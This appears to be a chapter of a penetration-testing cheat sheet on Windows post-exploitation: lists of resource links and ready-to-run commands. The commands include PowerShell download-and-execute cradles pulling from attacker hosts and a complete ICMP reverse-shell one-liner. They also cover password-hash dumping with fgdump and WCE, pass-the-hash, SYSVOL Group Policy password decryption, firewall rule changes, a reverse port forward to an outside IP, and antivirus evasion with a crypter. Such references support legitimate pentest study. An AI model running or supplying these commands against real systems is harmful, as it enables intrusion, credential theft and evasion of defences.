Chapter 4 - Windows Post-Exploitation

Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.”

— Indiana University (Best practices for computer security)

This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.

Resources

Windows Privilege Escalation Fundamentals - FuzzySecurity

Windows PrivEsc Check - GitHub

Windows Exploit Suggester - GitHub

Encyclopaedia Of Windows Privilege Escalation - YouTube

Level Up! Practical Windows Privilege Escalation - YouTube

Windows Privilege Escalation methods for PenTesters

Windows Attacks At is the new Black - YouTube

Well, that escalated quickly

Analyizing local privilege escalations in win2k

The System Challenge - Decoder's Blog

The Wallstreet of Windows Binaries

Windows Operating System Archaeology

Breaking .NET Through Serialization

Windows Kernel Exploits - GitHub

Cross Compiling from Kali

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c

Transpile Python into EXE

Kali> python pyinstaller.py --onefile file.py

Uploading Files

Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt

Security Stuff

Exploitation Techniques and Mitigations on Windows

Windows Exploitation

Authentication Registry Keys - MSDN

Demystifying AppContainers in Windows 8 Part 1

Protected Processes in Windows

LSA Authentication - MSDN

Intercepting System Calls on x86_64 Windows

Introduction to Windows Kernel Security

Windows 8 ASLR Internals

Windows Program Automatic Startup Locations

Demystifying the Windows Firewall

Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack

Bypassing Firewalls with Port 23

Pass the hash is dead long live LocalAccountTokenFilterPolicy

NetView

Getting Windows to play with itself: A PenTester's guide to Windows API abuse

AZURE

Compromise as a Service: our pleAZURE

Powershell Foo

Resources

Attacking ADFS Endpoints with PowerShell

PowerShell AD Recon

PowerShell Secrets and Tactics

An Intro to PowerShell and how to use it for Evil

Offensive Active Directory with PowerShell

Low-Level Windows API Access From PowerShell - FuzzySecurity

PowerShell Unicorn

Sherlock for Powershell

Download File

C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"

Note: If the above does not work you might need to convert it into utf-16 little endian because this is what the Windows OS expects. More here: UTF-16 is used internally by systems such as Microsoft Windows

Kali> echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10:8000/')" | iconv -t utf-16le

wget

echo $storageDir = $pwd > wget.ps1   
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1    
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo  ‐NonInteractive  ‐NoProfile ‐File wget.ps1

Execute ps1

C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1

Stream contents of file

C:\> Get-Item /path/to/file.zip -Stream *

Get permissions of directory/file

C:\> Get-ACL C:\path\to\file\or\directory

Packet testing

# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie")$client.Send($packet, $packet.Length);$client.Close();'

# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'

# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'

Reverse ICMP shell

Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET

C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"

Services

Windows Privilege Escalation via weak Service Permissions

The Art of Becoming TrustedInstaller

LDAP

5 Ways to find Systems running domain admin processes

I hunt SysAdmins part 1

I hunt SysAdmins part 2

PenTesting Active Directory Environments: CrapMapExec

Active Directory Privilege Relationships: BloodHound

Active Directory Architecture - MSDN

A Week of Evading Microsoft ATA Day 1

Dumping a domains worth of passwords with mimikatz part 2

Attack Methods for gaining Domain Admin

Find AD users with empty passwords

Domain Trusts and why you should care

A PenTester's guide to group scoping

How to own any Windows network with group policy hijacking attacks

Kerberos

The Secret Life of Krbtgt

Kerberos Golden Ticket Protection

Kerberos Golden Ticket Final

Et Tu Kerberos

Abusing Microsoft Kerberos

How to pass the ticket through SSH tunnels

From Pass the Hash to Pass the Ticket with no pain

Abusing Token Privileges for LPE

Dump Hashes

Dump windows password hashes efficiently part 1

I'll get your credentials... Later! - FuzzySecurity

Grab the Windows Secrets! - Decoder's Blog

C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

WCE

C:\> wce -w

PSExec

You need to be an admin already it copies an executable to an admin share and registers a service and starts it

SysInternals PSExec - TechNet

PUPY

WinEXE

PSExec Pass the Hash

Lateral Movement with Invoke-PsExec

UAC

UACME

Anatomy of UAC Attacks - FuzzySecurity

WMIC

WMIExec.py

Insecure File Permissions

Elevating privileges by exploiting weak folder permissions

C:\> icacls example.exe

Insecure SYSVOL

C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt

RDP

RDP Hijacking: How to hijack RDS and RemoteApp sessions transparently to move through an organization

DLL Injection

Windows DLL Injection Basics

Portable Execution Injection

Automated DLL Enumeration

Automated DLL Injection

NTLM/v2

Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes

SMB Relay demystified and NTLMv2 Pwnage with Python

Token Stealing

Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.

Passing the Hash

Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

Pass the Hash toolkit

runas

Invoke-Runas

Runas Reference

Encapsulating SSH Traffic with httptunnel

# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe

SigThief